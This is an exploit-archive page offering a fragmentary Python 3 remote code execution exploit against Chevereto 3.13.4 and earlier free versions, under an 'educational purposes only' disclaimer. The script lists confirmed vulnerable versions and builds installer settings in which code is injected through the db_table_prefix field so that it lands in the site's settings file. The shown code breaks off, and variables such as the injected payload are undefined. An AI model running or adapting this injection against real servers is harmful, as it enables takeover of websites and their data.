Exploits / Vulnerability Discovered : 2020-01-13 |
Type : webapps |
Platform : php
This exploit / vulnerability Chevereto 3.13.4 core remote code execution is for educational purposes only and if it is used you will do on your own risk!
from urllib import request, parse
from time import sleep
#Python3
#Needs to have a valid database server, database and user to exploit
#1.0.0 Free version confirmed vulnerable
#1.1.4 Free version confirmed vulnerable
#3.13.4 Core version confirmed vulnerable
#Clean data for when we want to clean up the settings file
params = {'db_host': db_host, 'db_name': db_name, 'db_user': db_user, 'db_pass': db_pass, 'db_table_prefix': db_table_prefix}
data = parse.urlencode(params).encode()
#Settings data with injected code
params['db_table_prefix'] += inject
dataInject = parse.urlencode(params).encode()